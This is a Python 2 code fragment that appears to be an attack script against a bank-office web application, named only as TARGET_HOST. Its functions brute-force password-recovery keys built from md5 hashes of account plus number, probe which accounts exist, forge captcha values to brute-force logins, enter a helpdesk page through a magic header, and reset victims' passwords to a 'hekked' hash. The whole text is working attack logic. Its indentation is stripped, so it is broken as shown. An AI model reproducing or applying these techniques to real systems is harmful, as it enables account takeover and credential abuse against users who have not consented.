def get_helpdesk():
opener = urllib2.build_opener()
req = urllib2.Request('http://{0}/helpdesk/pswdcheck.php'.format(TARGET_HOST), headers={'BANKOFFICEUSER': '******'})
data = my_url_open(opener, req)
if 'Charsets' in data:
pass
return data
def brute_one(self, account, num):
req = urllib2.Request(
'http://{0}/recovery.php?step=step3&login={1}'.format(TARGET_HOST, account),
urllib.urlencode(
{'key': md5('{0}{1}'.format(account, num)).hexdigest(), }
)
)
return my_url_open(self.opener, req)
def pre_test(self, account):
req = urllib2.Request(
'http://{0}/recovery.php?step=step2'.format(TARGET_HOST),
urllib.urlencode(
{'login': str(account).strip()}
),
)
data = my_url_open(self.opener, req)
if 'Please enter the key' in data or 'The key has been sent' in data:
return True
return False
def do_change(self, obj):
LOGGER.info('Changing password for: %s', obj.user)
req = urllib2.Request('http://{0}/change_password.php'.format(TARGET_HOST),
urllib.urlencode({
'password': obj.password,
'newpassword': sha1('{0}|hekked'.format(obj.user)).hexdigest(),
'newpassword2': sha1('{0}|hekked'.format(obj.user)).hexdigest(),
})
)
data = my_url_open(obj.opener, req)
if 'error' not in data:
LOGGER.critical('Password changed for user: %s', obj.user)
return True
def brute_login(self, user, password):
rand_captcha = str(random.randint(10000, 99999))
req = urllib2.Request(
'http://{0}/login.php'.format(TARGET_HOST),
urllib.urlencode(
{
'login': user.strip(),
'password': password.strip(),
'code': rand_captcha,
'_code': self.generate_captcha(rand_captcha)
}
)
# TODO: possible headers error
)
data = my_url_open(self.opener, req)
return data
